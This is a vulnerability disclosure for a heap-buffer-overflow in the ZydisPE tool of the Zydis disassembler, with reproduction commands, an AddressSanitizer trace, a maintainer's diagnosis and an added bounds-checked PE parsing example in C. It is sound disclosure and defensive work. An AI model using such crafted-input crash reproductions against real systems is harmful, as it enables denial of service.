Heap-based Buffer Overflow in zyantific/zydis

Valid

Reported on

Oct 21st 2021


Description

Hello, we hope you're doing well during these challenging times. Whilst testing zydis built from commit 077b185 with Clang 12 + ASan on Ubuntu 18.04, we discovered a crafted PE file that, when fed to ZydisPE, triggers a heap-buffer-overflow, READ of size 1.

Proof of Concept

POC Base64

echo base64 > /tmp/test.fuzz

./ZydisPE /tmp/test.fuzz

0000000000401FD5  66 2E 0F 1F 84 00 00 00 00 00                 nop word ptr ds:[rax+rax*1], ax
0000000000401FDF  66 0F 1F 44 00 00                             nop word ptr ds:[rax+rax*1], ax
=================================================================
==1628750==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000020e5 at pc 0x0000003b8be6 bp 0x7ffc172c1050 sp 0x7ffc172c1048
READ of size 1 at 0x6250000020e5 thread T0
    #0 0x3b8be5 in ZydisInputPeek /root/zydis/src/Decoder.c:310:18
    #1 0x3b8be5 in ZydisCollectOptionalPrefixes /root/zydis/src/Decoder.c:3284:9
    #2 0x3b8be5 in ZydisDecoderDecodeBuffer /root/zydis/src/Decoder.c:5074:5
    #3 0x3ab695 in DisassembleMappedPEFile /root/zydis/tools/ZydisPE.c:1021:26
    #4 0x3ab695 in main /root/zydis/tools/ZydisPE.c:1174:10
    #5 0x7fa6cc63a564 in __libc_start_main csu/../csu/libc-start.c:332:16
    #6 0x2f4e3d in _start (/root/zydis/build/ZydisPE+0x2f4e3d)

0x6250000020e5 is located 0 bytes to the right of 8165-byte region [0x625000000100,0x6250000020e5)
allocated by thread T0 here:
    #0 0x37009d in malloc (/root/zydis/build/ZydisPE+0x37009d)
    #1 0x3a4fae in main /root/zydis/tools/ZydisPE.c:1113:20
    #2 0x7fa6cc63a564 in __libc_start_main csu/../csu/libc-start.c:332:16

SUMMARY: AddressSanitizer: heap-buffer-overflow /root/zydis/src/Decoder.c:310:18 in ZydisInputPeek

Impact

Application crash, local denial of service

Please note that I am available for contract jobs, I can help you to improve your fuzzer code coverage, or just help you privately squash bugs. We have been successfully fuzzing Open Source Software for over a decade. Thank you.

We created a GitHub Issue asking the maintainers to create a SECURITY.md a month ago
Geeknik Labs modified their report
a month ago
We have opened a pull request with a SECURITY.md for zyantific/zydis to merge. a month ago
We have contacted a member of the zyantific/zydis team and are waiting to hear back a month ago
Joel Höner validated this vulnerability a month ago
Geeknik Labs has been awarded the disclosure bounty
The fix bounty is now up for grabs
Joel Höner
a month ago

Hi there and thanks for the report!

The ZydisPE tool is something that we wrote quite a while back as an example on how to use our formatter API for using custom symbols in disassembly output. Being meant as an example, it wasn’t hardened against crafted inputs in any form, as the comment here hints towards. Having it live in the tools directory was a mistake, because it suggests that it is something that we actually expect users to use. It should rather have lived in the examples folder, and should clarify more clearly that the PE parsing doesn’t perform any meaningful input validation.

Because we’re quite aware of the limitations in the implementation, the tool doesn’t have an install rule defined for it, meaning that it isn’t installed when you invoke make install, nor is it shipped in any of the repositories that have packages for Zydis. The practical impact of this vuln should thus be relatively low.

For the time being, we just completely deleted the ZydisPE tool. Because none of the packaged versions of Zydis include this tool and shipping updated packages is thus not required for a fix, we'd be fine with disclosing this publicly immediately. We didn't obfuscate the commit message, so the issue is now essentially public already:

https://github.com/zyantific/zydis/pull/257

In any case, this report served as a valuable reminder that we don't have fuzzing coverage even for the tools that we install and do intend users to use (ZydisInfo, ZydisDisasm) and that we should change that ASAP. Unfortunately, OSS-Fuzz doesn't appear to have a mechanism to apply weights to fuzzing targets, so adding these two targets will take away 66% of CPU from ZydisFuzzIn, which we consider to be the most important target that should receive the majority of compute to find bugs all across the library rather than just the helper tools. Perhaps we should just have a field in the control block in ZydisFuzzIn that, when the fuzzer flips it on, invokes the main function of the respective tool (essentially just #include<> the other tools into ZydisFuzzIn), but it sounds like a bit of a PITA to get it right w.r.t. the command line arguments being passed like the fuzzer would otherwise do it on its own etc. Anyways, we'll find a way (or just accept the 66% perf hit).

Geeknik Labs
a month ago

Researcher


Message received and understood, however, I believe some of the issues we reported reside OUTSIDE of the ZydisPE tool, for example:

heap-buffer-overflow in ZydisInputNextBytes /root/zydis/src/Decoder.c:403:9
heap-buffer-overflow in ZydisInputNext /root/zydis/src/Decoder.c:364:33

We attached Base64 encoded POCs for those as well, however you do have to use the ZydisPE tool to reach those points in the Zydis code as we didn't write any other kind of harness to test.

Joel Höner
a month ago

Given that Zydis' decoder and formatter don't actually allocate any heap memory at all, this is most likely a result of bad values being passed to the decoder (too large size and too small buffer) due to previous lack of validation in ZydisPE. However, let me verify this to make absolutely sure this is the case before we publish this.

Geeknik Labs
a month ago

Researcher


No worries, I just wanted to make sure all the bases were covered. Thank you.

Joel Höner
a month ago

I manually checked in LLDB and can confirm that it is indeed just ZydisPE passing invalid arguments. For example, it's passing 0x00006250000020f0 as the input buffer and length = 16, and then a 4 byte read at 0x6250000020f9 triggers ASAN, which proves that the provided buffer was invalid to begin with. The situation is the same (with different buffer sizes) in the other example.
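
The diagnosis above (the decoder reads past the end of a heap region because the PE parser handed it a section pointer and length it never validated against the mapped file) is the kind of missing check the following added example supplies. This is constructed C written for this page, not Zydis project code; the minimal sample image, its offsets and the function names are assumptions built inline.

```c
/* Added example, not Zydis code: bounds-checked PE section walk. Every offset is
 * validated against the mapped size before it is read, and a section is accepted
 * only if its raw range fits in the file; ZydisPE skipped this and passed the
 * decoder an out-of-bounds (buffer, length) pair. Offsets follow PE/COFF layout. */
#include <stddef.h>
#include <stdint.h>
/* Overflow-safe little-endian readers: fail instead of reading past the image. */
static int rd32(const uint8_t *b, size_t len, size_t off, uint32_t *out) {
    if (off > len || len - off < 4) return 0;
    *out = (uint32_t)b[off] | (uint32_t)b[off + 1] << 8 |
           (uint32_t)b[off + 2] << 16 | (uint32_t)b[off + 3] << 24;
    return 1;
}
static int rd16(const uint8_t *b, size_t len, size_t off, uint32_t *out) {
    if (off > len || len - off < 2) return 0;
    *out = (uint32_t)(b[off] | (b[off + 1] << 8));
    return 1;
}
/* Sections whose raw data lies fully inside the image; -1 if headers are malformed. */
int count_valid_sections(const uint8_t *img, size_t len) {
    uint32_t e_lfanew, sig, nsec, optsz, rawsz, rawptr;
    if (!rd32(img, len, 0x3c, &e_lfanew) || !rd32(img, len, e_lfanew, &sig) ||
        sig != 0x00004550u)                                  /* "PE\0\0" */
        return -1;
    if (!rd16(img, len, (size_t)e_lfanew + 6, &nsec) ||     /* NumberOfSections */
        !rd16(img, len, (size_t)e_lfanew + 20, &optsz))     /* SizeOfOptionalHeader */
        return -1;
    size_t table = (size_t)e_lfanew + 24 + optsz;            /* first section header */
    int ok = 0;
    for (uint32_t i = 0; i < nsec; i++) {
        size_t hdr = table + (size_t)i * 40;
        if (!rd32(img, len, hdr + 16, &rawsz) ||             /* SizeOfRawData */
            !rd32(img, len, hdr + 20, &rawptr))              /* PointerToRawData */
            return -1;                                       /* section table truncated */
        if (rawptr <= len && rawsz <= len - rawptr) ok++;    /* no wrap, no overrun */
    }
    return ok;
}
/* Constructed sample: two sections, the second deliberately runs 8 bytes past EOF. */
static void put32(uint8_t *b, size_t off, uint32_t v) {
    for (int i = 0; i < 4; i++) b[off + i] = (uint8_t)(v >> (8 * i));
}
int check_sample(size_t len) {           /* validates only the first len bytes */
    uint8_t img[0x200] = {0};
    put32(img, 0x3c, 0x40);              /* e_lfanew -> PE header at 0x40 */
    put32(img, 0x40, 0x00004550u);       /* signature; optional header size left 0 */
    img[0x46] = 2;                       /* NumberOfSections */
    put32(img, 0x58 + 16, 0x20); put32(img, 0x58 + 20, 0x100);                   /* fits */
    put32(img, 0x80 + 16, 0x10); put32(img, 0x80 + 20, (uint32_t)sizeof img - 8); /* overruns */
    return count_valid_sections(img, len < sizeof img ? len : sizeof img);
}
```

A section that fails the final range check is exactly the case the decoder cannot defend against on its own, since it trusts the length it is given.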

Geeknik Labs
a month ago

Researcher


Thank you for the clarification.

Joel Höner confirmed that a fix has been merged on 869dfb a month ago
The fix bounty has been dropped